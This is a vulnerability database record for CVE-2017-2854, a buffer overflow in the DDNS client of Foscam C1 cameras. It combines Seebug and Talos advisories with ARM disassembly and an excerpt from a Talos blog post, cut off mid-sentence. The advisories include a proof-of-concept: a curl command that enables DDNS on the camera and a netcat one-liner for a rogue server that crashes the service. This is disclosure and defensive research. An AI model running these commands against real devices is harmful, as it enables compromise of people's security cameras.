ID CVE-2017-2854 Type cve Reporter cve@mitre.org Modified 2018-12-13T15:11:00
Description
An exploitable buffer overflow vulnerability exists in the DDNS client used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.43. On devices with DDNS enabled, an attacker who is able to intercept HTTP connections will be able to fully compromise the device by creating a rogue HTTP server.
{"seebug": [{"lastseen": "2017-11-19T11:57:08", "description": "### Summary\r\nAn exploitable buffer overflow vulnerability exists in the DDNS client used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.43. On devices with DDNS enabled, an attacker who is able to intercept HTTP connections will be able to fully compromise the device by creating a rogue HTTP server.\r\n\r\n### Tested Versions\r\n* Foscam Indoor IP Camera C1 Series\r\n* System Firmware Version: 1.9.3.18\r\n* Application Firmware Version: 2.52.2.43\r\n* Plug-In Version: 3.3.0.26\r\n\r\n### Product URLs\r\nhttp://www.foscam.com/downloads/index.html\r\n\r\n### CVSSv3 Score\r\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')\r\n\r\n### Details\r\nFoscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. One of these models is the C1 series which contains a web-based user interface for management and is based on the arm architecture. Foscam is considered one of the most common security cameras out on the current market.\r\n\r\nThe device can be configured to use a DDNS client to associate to a hostname the public IP address of the network hosting the camera. Clients have to be configured via the web interface by choosing between one of the supported DDNS providers together with a hostname, username and password. When the \"webService\" process starts it creates several threads, one of them is the \"DDNS update thread\", function `ThreadEntry_DdnsUpdate`. At [1] `r0` contains the seconds elapsed since the last loop execution. Every 10 seconds [2], the function retrieves the public IP address [3] and if it detects a difference the new IP is updated [4]. 
The function `getMyGloableIp` takes a pointer to the global structure at 0xa8074 as parameter [5]. This structure is located in the .bss segment and has a size of 140 bytes.\r\n```\r\n... ThreadEntry_DdnsUpdate\r\n...\r\n.text:00051BC4 09 00 50 E3 CMP R0, #9 ; [1]\r\n.text:00051BC8 00 00 A0 D3 MOVLE R0, #0\r\n.text:00051BCC 01 00 A0 C3 MOVGT R0, #1\r\n.text:00051BD0 00 00 50 E3 CMP R0, #0 ; [2]\r\n.text:00051BD4 12 00 00 0A BEQ loc_51C24\r\n.text:00051BD8 04 00 A0 E1 MOV R0, R4 ; [5]\r\n.text:00051BDC 8B FF FF EB BL getMyGloableIp ; [3]\r\n.text:00051BE0 00 00 50 E3 CMP R0, #0\r\n.text:00051BE4 0C 00 00 0A BEQ loc_51C1C\r\n...\r\n.text:00051C5C 04 00 A0 E1 MOV R0, R4\r\n.text:00051C60 CB FE FF EB BL sub_51794 ; [4]\r\n```\r\n\r\nThe function `getMyGloableIp`, checks if the configured hostname is not empty [6], then it retrieves the \"ddnsServer\" which is currently set [7]: this is a number between 0 and 5. 0 means that no DDNS is set [8], and retrieving the public IP address with DDNS number 3 is not supported [9]. Using this index, another function is called [10] that returns the \"ddnsServer\" instance (using a singleton pattern). The function responsible for retrieving the public IP address is then called [11], passing as arguments the \"ddnsServer\" instance and a buffer for storing the IP address [12]. This buffer starts at offset 0x58 in the global structure at 0xa8074. 
Note that for every provider a different function is used to retrieve the public IP address.\r\n```\r\n.text:00051A10 getMyGloableIp\r\n...\r\n.text:00051A20 00 40 A0 E1 MOV R4, R0\r\n...\r\n.text:00051A28 08 30 90 E5 LDR R3, [R0,#8]\r\n.text:00051A2C 00 30 D3 E5 LDRB R3, [R3]\r\n.text:00051A30 00 00 53 E3 CMP R3, #0 ; [6]\r\n.text:00051A34 34 00 00 1A BNE loc_51B0C\r\n...\r\n.text:00051A44 30 00 00 EA B loc_51B0C\r\n.text:00051A48\r\n.text:00051A48 loc_51A48\r\n.text:00051A48 30 10 94 E5 LDR R1, [R4,#0x30]\r\n.text:00051A4C 34 20 94 E5 LDR R2, [R4,#0x34]\r\n.text:00051A50 C8 30 9F E5 LDR R3, =sub_51D20\r\n.text:00051A54 BF F0 FF EB BL sub_4DD58 ; [10]\r\n.text:00051A58 58 50 84 E2 ADD R5, R4, #0x58\r\n.text:00051A5C 05 10 A0 E1 MOV R1, R5 ; [12]\r\n.text:00051A60 00 30 90 E5 LDR R3, [R0]\r\n.text:00051A64 00 30 93 E5 LDR R3, [R3]\r\n.text:00051A68 33 FF 2F E1 BLX R3 ; [11]\r\n...\r\n.text:00051B00 loc_51B00\r\n.text:00051B00 00 00 A0 E3 MOV R0, #0\r\n.text:00051B04 14 D0 8D E2 ADD SP, SP, #0x14\r\n.text:00051B08 30 80 BD E8 LDMFD SP!, {R4,R5,PC}\r\n.text:00051B0C\r\n.text:00051B0C loc_51B0C\r\n.text:00051B0C 0C 00 94 E5 LDR R0, [R4,#0xC] ; [7]\r\n.text:00051B10 03 00 50 E3 CMP R0, #3 ; [9]\r\n.text:00051B14 00 00 50 13 CMPNE R0, #0 ; [8]\r\n.text:00051B18 F8 FF FF 0A BEQ loc_51B00\r\n.text:00051B1C C9 FF FF EA B loc_51A48\r\n```\r\n\r\nWhen the DDNS provider in use is \"oray.com\" (DDNS number 1), the function `sub_4E460` is called. This function calls `sub_53808` [13] to establish a connection with \"ddns.oray.com\" on port 80. An HTTP request is built [14] and sent to the socket by calling `CDdnsClient__readyToSend` [15]. 
The response from the remote server is then retrieved using `CDdnsClient__readyToRead` [16], which will read at most 1024 bytes [17].\r\n```\r\n.text:0004E460 sub_4E460\r\n.text:0004E460\r\n.text:0004E460 F0 40 2D E9 STMFD SP!, {R4-R7,LR}\r\n.text:0004E464 C1 DE 4D E2 SUB SP, SP, #0xC10\r\n.text:0004E468 0C D0 4D E2 SUB SP, SP, #0xC\r\n.text:0004E46C 00 40 A0 E1 MOV R4, R0\r\n.text:0004E470 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E474 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E478 01 50 A0 E1 MOV R5, R1\r\n...\r\n.text:0004E4A0 00 30 94 E5 LDR R3, [R4]\r\n.text:0004E4A4 03 1B 8D E2 ADD R1, SP, #0xC30+var_30\r\n.text:0004E4A8 10 C0 93 E5 LDR R12, [R3,#0x10]\r\n.text:0004E4AC 04 00 A0 E1 MOV R0, R4\r\n.text:0004E4B0 0C 10 81 E2 ADD R1, R1, #0xC ; \"ddns.oray.com\"\r\n...\r\n.text:0004E4BC 3C FF 2F E1 BLX R12 ; [13]\r\n...\r\n.text:0004E4D8 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E4DC 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E4E0 D0 11 9F E5 LDR R1, =aGetCheckipHttp ; \"GET /checkip HTTP/1.1\\r\\n\"\r\n.text:0004E4E4 2C 12 FF EB BL _ZNSspLEPKc\r\n.text:0004E4E8 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E4EC 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E4F0 C4 11 9F E5 LDR R1, =aAccept ; \"Accept: */*\\r\\n\"\r\n.text:0004E4F4 28 12 FF EB BL _ZNSspLEPKc\r\n.text:0004E4F8 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E4FC 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E500 B8 11 9F E5 LDR R1, =aUserAgentFosca ; \"User-Agent: Foscam ipcam\\r\\n\"\r\n.text:0004E504 24 12 FF EB BL _ZNSspLEPKc\r\n.text:0004E508 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E50C 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E510 AC 11 9F E5 LDR R1, =aHostDdns_oray_ ; \"Host: ddns.oray.com\\r\\n\"\r\n.text:0004E514 20 12 FF EB BL _ZNSspLEPKc\r\n.text:0004E518 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E51C 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E520 A0 11 9F E5 LDR R1, =(asc_8D92C+2) ; \"\\r\\n\"\r\n.text:0004E524 1C 12 FF EB BL _ZNSspLEPKc\r\n.text:0004E528 0C 00 
8D E2 ADD R0, SP, #0xC30+dest\r\n.text:0004E52C 14 1C 9D E5 LDR R1, [SP,#0xC30+src]\r\n.text:0004E530 95 14 FF EB BL strcpy ; [14]\r\n.text:0004E534 00 30 94 E5 LDR R3, [R4]\r\n.text:0004E538 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\r\n.text:0004E53C 04 00 80 E2 ADD R0, R0, #4\r\n.text:0004E540 14 70 93 E5 LDR R7, [R3,#0x14]\r\n.text:0004E544 10 6C 9D E5 LDR R6, [SP,#0xC30+var_20]\r\n.text:0004E548 FA 12 FF EB BL _ZNKSs6lengthEv\r\n.text:0004E54C 00 30 A0 E1 MOV R3, R0\r\n.text:0004E550 06 10 A0 E1 MOV R1, R6\r\n.text:0004E554 04 00 A0 E1 MOV R0, R4\r\n.text:0004E558 0C 20 8D E2 ADD R2, SP, #0xC30+dest\r\n.text:0004E55C 37 FF 2F E1 BLX R7 ; [15]\r\n...\r\n.text:0004E58C 01 3B A0 E3 MOV R3, #0x400 ; [17]\r\n.text:0004E590 3C FF 2F E1 BLX R12 ; [16]\r\n```\r\n\r\nThe function then ensures that the string \"200 OK\" is present anywhere in the response [18] and then finds the string \"Current IP Address:\" [19]. After this string the function expects to find the IP address. From this point every character is copied in the buffer passed to the function [20] using a loop, which will only exit when the character \"<\" [21] is found. 
Since the size of the destination buffer is not taken into account, a malicious HTTP server could exploit this vulnerability to write out of bounds.\r\n```\r\n.text:0004E594 00 00 50 E3 CMP R0, #0\r\n.text:0004E598 05 00 00 CA BGT loc_4E5B4\r\n...\r\n.text:0004E5B4 loc_4E5B4\r\n.text:0004E5B4 02 6B 8D E2 ADD R6, SP, #0xC30+var_430\r\n.text:0004E5B8 0C 60 86 E2 ADD R6, R6, #0xC\r\n.text:0004E5BC 06 00 A0 E1 MOV R0, R6\r\n.text:0004E5C0 0C 11 9F E5 LDR R1, =str.200OK ; [18]\r\n.text:0004E5C4 98 13 FF EB BL strstr\r\n.text:0004E5C8 00 00 50 E3 CMP R0, #0\r\n.text:0004E5CC 09 00 00 1A BNE loc_4E5F8\r\n...\r\n.text:0004E5F8 loc_4E5F8\r\n.text:0004E5F8 06 00 A0 E1 MOV R0, R6\r\n.text:0004E5FC E0 10 9F E5 LDR R1, =aCurrentIpAdd_1 ; \"Current IP Address:\"\r\n.text:0004E600 89 13 FF EB BL strstr ; [19]\r\n.text:0004E604 00 00 50 E3 CMP R0, #0\r\n.text:0004E608 01 00 00 1A BNE loc_4E614\r\n.text:0004E60C 09 00 00 EA B loc_4E638\r\n.text:0004E610\r\n.text:0004E610 loc_4E610\r\n.text:0004E610 01 30 45 E5 STRB R3, [R5,#-1] ; [20]\r\n.text:0004E614\r\n.text:0004E614 loc_4E614\r\n.text:0004E614 13 30 D0 E5 LDRB R3, [R0,#0x13]\r\n.text:0004E618 05 20 A0 E1 MOV R2, R5\r\n.text:0004E61C 3C 00 53 E3 CMP R3, #0x3C ; [21]\r\n.text:0004E620 01 50 85 E2 ADD R5, R5, #1\r\n.text:0004E624 01 00 80 E2 ADD R0, R0, #1\r\n.text:0004E628 F8 FF FF 1A BNE loc_4E610\r\n.text:0004E62C 00 50 A0 E3 MOV R5, #0\r\n.text:0004E630 00 50 C2 E5 STRB R5, [R2]\r\n.text:0004E634 03 00 00 EA B loc_4E648\r\n```\r\n\r\n\r\n### Timeline\r\n* 2017-07-17 - Vendor Disclosure\r\n* 2017-11-13 - Public Release", "published": "2017-11-14T00:00:00", "type": "seebug", "title": "Foscam IP Video Camera webService oray.com DDNS Client Code Execution Vulnerability(CVE-2017-2854)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2854"], "modified": "2017-11-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96860", "id": "SSV:96860", "sourceData": "\n Prerequisite for this attack is that the device is setup to use 
the DDNS number 1. For this, the following query can be used:\r\n```\r\n$ sUsr=\"admin\"\r\n$ sPwd=\"\"\r\n$ curl \"http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=${sUsr}&pwd=${sPwd}\r\n&cmd=setDDNSConfig&isEnable=1&hostName=x&ddnsServer=1&user=x&password=x\"\r\n```\r\nTo trigger the vulnerability, an attacker needs to be able to intercept the device's HTTP requests and answer with a malicious payload. The following command will make the service crash.\r\n```\r\n$ sudo nc -l -p 80 <<< $( python2 -c 'print \"200 OK Current IP Address:\"+\"A\"*900+\"<\"' )\r\n```\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96860", "cvss": {"score": 0.0, "vector": "NONE"}}], "talos": [{"lastseen": "2020-07-01T21:25:15", "bulletinFamily": "info", "cvelist": ["CVE-2017-2854"], "description": "# Talos Vulnerability Report\n\n### TALOS-2017-0357\n\n## Foscam IP Video Camera webService oray.com DDNS Client Code Execution Vulnerability\n\n##### November 13, 2017\n\n##### CVE Number\n\nCVE-2017-2854\n\n### Summary\n\nAn exploitable buffer overflow vulnerability exists in the DDNS client used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.43. On devices with DDNS enabled, an attacker who is able to intercept HTTP connections will be able to fully compromise the device by creating a rogue HTTP server.\n\n### Tested Versions\n\nFoscam Indoor IP Camera C1 Series \nSystem Firmware Version: 1.9.3.18 \nApplication Firmware Version: 2.52.2.43 \nPlug-In Version: 3.3.0.26\n\n### Product URLs\n\n<http://www.foscam.com/downloads/index.html>\n\n### CVSSv3 Score\n\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-120: Buffer Copy without Checking Size of Input (\u2018Classic Buffer Overflow\u2019)\n\n### Details\n\nFoscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. 
One of these models is the C1 series which contains a web-based user interface for management and is based on the arm architecture. Foscam is considered one of the most common security cameras out on the current market.\n\nThe device can be configured to use a DDNS client to associate to a hostname the public IP address of the network hosting the camera. Clients have to be configured via the web interface by choosing between one of the supported DDNS providers together with a hostname, username and password. When the \u201cwebService\u201d process starts it creates several threads, one of them is the \u201cDDNS update thread\u201d, function `ThreadEntry_DdnsUpdate`. At [1] `r0` contains the seconds elapsed since the last loop execution. Every 10 seconds [2], the function retrieves the public IP address [3] and if it detects a difference the new IP is updated [4]. The function `getMyGloableIp` takes a pointer to the global structure at 0xa8074 as parameter [5]. This structure is located in the `.bss` segment and has a size of 140 bytes.\n \n \n ... ThreadEntry_DdnsUpdate\n ...\n .text:00051BC4 09 00 50 E3 CMP R0, #9 ; [1]\n .text:00051BC8 00 00 A0 D3 MOVLE R0, #0\n .text:00051BCC 01 00 A0 C3 MOVGT R0, #1\n .text:00051BD0 00 00 50 E3 CMP R0, #0 ; [2]\n .text:00051BD4 12 00 00 0A BEQ loc_51C24\n .text:00051BD8 04 00 A0 E1 MOV R0, R4 ; [5]\n .text:00051BDC 8B FF FF EB BL getMyGloableIp ; [3]\n .text:00051BE0 00 00 50 E3 CMP R0, #0\n .text:00051BE4 0C 00 00 0A BEQ loc_51C1C\n ...\n .text:00051C5C 04 00 A0 E1 MOV R0, R4\n .text:00051C60 CB FE FF EB BL sub_51794 ; [4]\n \n\nThe function `getMyGloableIp`, checks if the configured hostname is not empty [6], then it retrieves the \u201cddnsServer\u201d which is currently set [7]: this is a number between 0 and 5. 0 means that no DDNS is set [8], and retrieving the public IP address with DDNS number 3 is not supported [9]. 
Using this index, another function is called [10] that returns the \u201cddnsServer\u201d instance (using a singleton pattern). The function responsible for retrieving the public IP address is then called [11], passing as arguments the \u201cddnsServer\u201d instance and a buffer for storing the IP address [12]. This buffer starts at offset 0x58 in the global structure at 0xa8074. Note that for every provider a different function is used to retrieve the public IP address.\n \n \n .text:00051A10 getMyGloableIp\n ...\n .text:00051A20 00 40 A0 E1 MOV R4, R0\n ...\n .text:00051A28 08 30 90 E5 LDR R3, [R0,#8]\n .text:00051A2C 00 30 D3 E5 LDRB R3, [R3]\n .text:00051A30 00 00 53 E3 CMP R3, #0 ; [6]\n .text:00051A34 34 00 00 1A BNE loc_51B0C\n ...\n .text:00051A44 30 00 00 EA B loc_51B0C\n .text:00051A48\n .text:00051A48 loc_51A48\n .text:00051A48 30 10 94 E5 LDR R1, [R4,#0x30]\n .text:00051A4C 34 20 94 E5 LDR R2, [R4,#0x34]\n .text:00051A50 C8 30 9F E5 LDR R3, =sub_51D20\n .text:00051A54 BF F0 FF EB BL sub_4DD58 ; [10]\n .text:00051A58 58 50 84 E2 ADD R5, R4, #0x58\n .text:00051A5C 05 10 A0 E1 MOV R1, R5 ; [12]\n .text:00051A60 00 30 90 E5 LDR R3, [R0]\n .text:00051A64 00 30 93 E5 LDR R3, [R3]\n .text:00051A68 33 FF 2F E1 BLX R3 ; [11]\n ...\n .text:00051B00 loc_51B00\n .text:00051B00 00 00 A0 E3 MOV R0, #0\n .text:00051B04 14 D0 8D E2 ADD SP, SP, #0x14\n .text:00051B08 30 80 BD E8 LDMFD SP!, {R4,R5,PC}\n .text:00051B0C\n .text:00051B0C loc_51B0C\n .text:00051B0C 0C 00 94 E5 LDR R0, [R4,#0xC] ; [7]\n .text:00051B10 03 00 50 E3 CMP R0, #3 ; [9]\n .text:00051B14 00 00 50 13 CMPNE R0, #0 ; [8]\n .text:00051B18 F8 FF FF 0A BEQ loc_51B00\n .text:00051B1C C9 FF FF EA B loc_51A48\n \n\nWhen the DDNS provider in use is \u201coray.com\u201d (DDNS number 1), the function `sub_4E460` is called. This function calls `sub_53808` [13] to establish a connection with \u201cddns.oray.com\u201d on port 80. 
An HTTP request is built [14] and sent to the socket by calling `CDdnsClient__readyToSend` [15]. The response from the remote server is then retrieved using `CDdnsClient__readyToRead` [16], which will read at most 1024 bytes [17].\n \n \n .text:0004E460 sub_4E460\n .text:0004E460\n .text:0004E460 F0 40 2D E9 STMFD SP!, {R4-R7,LR}\n .text:0004E464 C1 DE 4D E2 SUB SP, SP, #0xC10\n .text:0004E468 0C D0 4D E2 SUB SP, SP, #0xC\n .text:0004E46C 00 40 A0 E1 MOV R4, R0\n .text:0004E470 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E474 04 00 80 E2 ADD R0, R0, #4\n .text:0004E478 01 50 A0 E1 MOV R5, R1\n ...\n .text:0004E4A0 00 30 94 E5 LDR R3, [R4]\n .text:0004E4A4 03 1B 8D E2 ADD R1, SP, #0xC30+var_30\n .text:0004E4A8 10 C0 93 E5 LDR R12, [R3,#0x10]\n .text:0004E4AC 04 00 A0 E1 MOV R0, R4\n .text:0004E4B0 0C 10 81 E2 ADD R1, R1, #0xC ; \"ddns.oray.com\"\n ...\n .text:0004E4BC 3C FF 2F E1 BLX R12 ; [13]\n ...\n .text:0004E4D8 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E4DC 04 00 80 E2 ADD R0, R0, #4\n .text:0004E4E0 D0 11 9F E5 LDR R1, =aGetCheckipHttp ; \"GET /checkip HTTP/1.1\\r\\n\"\n .text:0004E4E4 2C 12 FF EB BL _ZNSspLEPKc\n .text:0004E4E8 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E4EC 04 00 80 E2 ADD R0, R0, #4\n .text:0004E4F0 C4 11 9F E5 LDR R1, =aAccept ; \"Accept: */*\\r\\n\"\n .text:0004E4F4 28 12 FF EB BL _ZNSspLEPKc\n .text:0004E4F8 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E4FC 04 00 80 E2 ADD R0, R0, #4\n .text:0004E500 B8 11 9F E5 LDR R1, =aUserAgentFosca ; \"User-Agent: Foscam ipcam\\r\\n\"\n .text:0004E504 24 12 FF EB BL _ZNSspLEPKc\n .text:0004E508 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E50C 04 00 80 E2 ADD R0, R0, #4\n .text:0004E510 AC 11 9F E5 LDR R1, =aHostDdns_oray_ ; \"Host: ddns.oray.com\\r\\n\"\n .text:0004E514 20 12 FF EB BL _ZNSspLEPKc\n .text:0004E518 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E51C 04 00 80 E2 ADD R0, R0, #4\n .text:0004E520 A0 11 9F E5 LDR R1, =(asc_8D92C+2) ; \"\\r\\n\"\n 
.text:0004E524 1C 12 FF EB BL _ZNSspLEPKc\n .text:0004E528 0C 00 8D E2 ADD R0, SP, #0xC30+dest\n .text:0004E52C 14 1C 9D E5 LDR R1, [SP,#0xC30+src]\n .text:0004E530 95 14 FF EB BL strcpy ; [14]\n .text:0004E534 00 30 94 E5 LDR R3, [R4]\n .text:0004E538 C1 0E 8D E2 ADD R0, SP, #0xC30+var_20\n .text:0004E53C 04 00 80 E2 ADD R0, R0, #4\n .text:0004E540 14 70 93 E5 LDR R7, [R3,#0x14]\n .text:0004E544 10 6C 9D E5 LDR R6, [SP,#0xC30+var_20]\n .text:0004E548 FA 12 FF EB BL _ZNKSs6lengthEv\n .text:0004E54C 00 30 A0 E1 MOV R3, R0\n .text:0004E550 06 10 A0 E1 MOV R1, R6\n .text:0004E554 04 00 A0 E1 MOV R0, R4\n .text:0004E558 0C 20 8D E2 ADD R2, SP, #0xC30+dest\n .text:0004E55C 37 FF 2F E1 BLX R7 ; [15]\n ...\n .text:0004E58C 01 3B A0 E3 MOV R3, #0x400 ; [17]\n .text:0004E590 3C FF 2F E1 BLX R12 ; [16]\n \n\nThe function then ensures that the string \u201c200 OK\u201d is present anywhere in the response [18] and then finds the string \u201cCurrent IP Address:\u201d [19]. After this string the function expects to find the IP address. From this point every character is copied in the buffer passed to the function [20] using a loop, which will only exit when the character \u201c<\u201d [21] is found. 
Since the size of the destination buffer is not taken into account, a malicious HTTP server could exploit this vulnerability to write out of bounds.\n \n \n .text:0004E594 00 00 50 E3 CMP R0, #0\n .text:0004E598 05 00 00 CA BGT loc_4E5B4\n ...\n .text:0004E5B4 loc_4E5B4\n .text:0004E5B4 02 6B 8D E2 ADD R6, SP, #0xC30+var_430\n .text:0004E5B8 0C 60 86 E2 ADD R6, R6, #0xC\n .text:0004E5BC 06 00 A0 E1 MOV R0, R6\n .text:0004E5C0 0C 11 9F E5 LDR R1, =str.200OK ; [18]\n .text:0004E5C4 98 13 FF EB BL strstr\n .text:0004E5C8 00 00 50 E3 CMP R0, #0\n .text:0004E5CC 09 00 00 1A BNE loc_4E5F8\n ...\n .text:0004E5F8 loc_4E5F8\n .text:0004E5F8 06 00 A0 E1 MOV R0, R6\n .text:0004E5FC E0 10 9F E5 LDR R1, =aCurrentIpAdd_1 ; \"Current IP Address:\"\n .text:0004E600 89 13 FF EB BL strstr ; [19]\n .text:0004E604 00 00 50 E3 CMP R0, #0\n .text:0004E608 01 00 00 1A BNE loc_4E614\n .text:0004E60C 09 00 00 EA B loc_4E638\n .text:0004E610\n .text:0004E610 loc_4E610\n .text:0004E610 01 30 45 E5 STRB R3, [R5,#-1] ; [20]\n .text:0004E614\n .text:0004E614 loc_4E614\n .text:0004E614 13 30 D0 E5 LDRB R3, [R0,#0x13]\n .text:0004E618 05 20 A0 E1 MOV R2, R5\n .text:0004E61C 3C 00 53 E3 CMP R3, #0x3C ; [21]\n .text:0004E620 01 50 85 E2 ADD R5, R5, #1\n .text:0004E624 01 00 80 E2 ADD R0, R0, #1\n .text:0004E628 F8 FF FF 1A BNE loc_4E610\n .text:0004E62C 00 50 A0 E3 MOV R5, #0\n .text:0004E630 00 50 C2 E5 STRB R5, [R2]\n .text:0004E634 03 00 00 EA B loc_4E648\n \n\n### Exploit Proof-of-Concept\n\nPrerequisite for this attack is that the device is setup to use the DDNS number 1. For this, the following query can be used:\n \n \n ```\n $ sUsr=\"admin\"\n $ sPwd=\"\"\n $ curl \"http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=${sUsr}&pwd=${sPwd}\n &cmd=setDDNSConfig&isEnable=1&hostName=x&ddnsServer=1&user=x&password=x\"\n ```\n \n\nTo trigger the vulnerability, an attacker needs to be able to intercept the device\u2019s HTTP requests and answer with a malicious payload. 
The following command will make the service crash.\n \n \n ```\n $ sudo nc -l -p 80 <<< $( python2 -c 'print \"200 OK Current IP Address:\"+\"A\"*900+\"<\"' )\n ```\n \n\n### Timeline\n\n2017-07-17 - Vendor Disclosure \n2017-11-13 - Public Release\n\n##### Credit\n\nDiscovered by Claudio Bozzato and another member of Cisco Talos.\n", "edition": 6, "modified": "2017-11-13T00:00:00", "published": "2017-11-13T00:00:00", "id": "TALOS-2017-0357", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0357", "title": "Foscam IP Video Camera webService oray.com DDNS Client Code Execution Vulnerability", "type": "talos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-11-13T17:34:56", "bulletinFamily": "blog", "cvelist": ["CVE-2017-2854", "CVE-2017-2855", "CVE-2017-2856", "CVE-2017-2857", "CVE-2017-2872", "CVE-2017-2873", "CVE-2017-2874", "CVE-2017-2875", "CVE-2017-2876", "CVE-2017-2877", "CVE-2017-2878", "CVE-2017-2879"], "description": "<i>These vulnerabilities were discovered by Claudio Bozzato of Cisco Talos.</i><br /><br /><h2 id=\"h.zay7s6txaomh\">Executive Summary</h2><br />The Foscam C1 Indoor HD Camera is a network-based camera that is marketed for use in a variety of applications, including use as a home security monitoring device. Talos recently identified several vulnerabilities present in these devices, and worked with Foscam to develop fixes for them, which we published the details for in a blog post <a href=\"http://blog.talosintelligence.com/2017/06/foscam-vuln-details.html\">here</a>. In continuing our security assessment of these devices, Talos has discovered additional vulnerabilities. In accordance with our responsible disclosure policy, Talos has worked with Foscam to ensure that these issues are resolved and that a firmware update is made available for affected customers. 
These vulnerabilities could be leveraged by an attacker to achieve remote code execution on affected devices, as well as upload rogue firmware images to the devices, which could result in an attacker being able to completely take control of the devices.<br /><a name='more'></a><h3>Foscam IP Video Camera webService DDNS Client Code Execution Vulnerabilities</h3><br />Foscam C1 Indoor HD Cameras are vulnerable to several buffer overflow vulnerabilities on devices with Dynamic DNS (DDNS) enabled. On devices with DDNS enabled, an attacker could leverage a rogue HTTP server to exploit these vulnerabilities. When the device boots, a thread is spawned that routinely checks the configured DDNS server for updates or changes to the IP address associated with the DDNS server. In cases where the device is configured to use the DDNS, the device will send requests to the DDNS server and write the associated responses to the buffer, without performing proper bounds checking. This could be exploited by an attacker controlled server returning a specially crafted response larger than the allocated buffer, resulting in an overflow that could be leveraged to obtain remote code execution on affected devices. 
The following advisories and CVEs are associated with this vulnerability.<br /><br /><ul><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0357/\">Foscam IP Video Camera webService oray.com DDNS Client Code Execution Vulnerability (</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0357/\">TALOS-2017-0357</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0357/\"> / CVE-2017-2854)</a></li><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0358/\">Foscam IP Video Camera webService 3322.net DDNS Client Code Execution Vulnerability (</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0358/\">TALOS-2017-0358</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0358/\"> / CVE-2017-2855)</a></li><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0359/\">Foscam IP Video Camera webService dyndns.com DDNS Client Code Execution Vulnerability (</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0359/\">TALOS-2017-0359</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0359/\"> / CVE-2017-2856)</a></li><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0360/\">Foscam IP Video Camera webService 9299.org DDNS Client Code Execution Vulnerability (</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0360/\">TALOS-2017-0360</a><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0360/\"> / CVE-2017-2857)</a></li></ul><h3>Foscam IP Video Camera CGIProxy.fcgi Firmware Upgrade Unsigned Image Vulnerability (TALOS-2017-0379 / CVE-2017-2872)</h3><br />Foscam C1 HD Indoor cameras allow for firmware upgrades to be performed via the web management interface present on the devices. These devices lack sufficient security verification of firmware images provided by users. This functionality and lack of verification could be leveraged by an attacker to upload and execute custom firmware images on affected devices. 
In order to perform the firmware upgrade process, an attacker would require access to an account with administrative privileges on the device. TALOS-2017-0379 has been assigned CVE-2017-2872. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0379/\">here</a>.<br /><h3>Foscam IP Video Camera CGIProxy.fcgi SoftAP Configuration Command Injection Vulnerability (TALOS-2017-0380 / CVE-2017-2873)</h3><br />Foscam C1 HD Indoor cameras provide the ability to configure a SoftAP using the web management interface. The SoftAP configuration facilitates connecting to the device over wireless to perform initial device setup and configuration. These devices contain a command injection vulnerability in the 'devMng' binary that is reachable via the 'setSoftApConfig' command. This vulnerability could be leveraged to execute arbitrary operating system commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the affected device. TALOS-2017-0380 has been assigned CVE-2017-2873. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0380/\">here</a>.<br /><h3>Foscam IP Video Camera devMng Multi-Camera Port 10000 Command 0x0000 Information Disclosure Vulnerability (TALOS-2017-0381 / CVE-2017-2874)</h3><br />Foscam C1 HD Indoor cameras allow device-to-device communications over UDP/10000 and UDP/10001. These communications are designed to allow users to display video streams from multiple devices within a centralized web management interface. These devices are vulnerable to 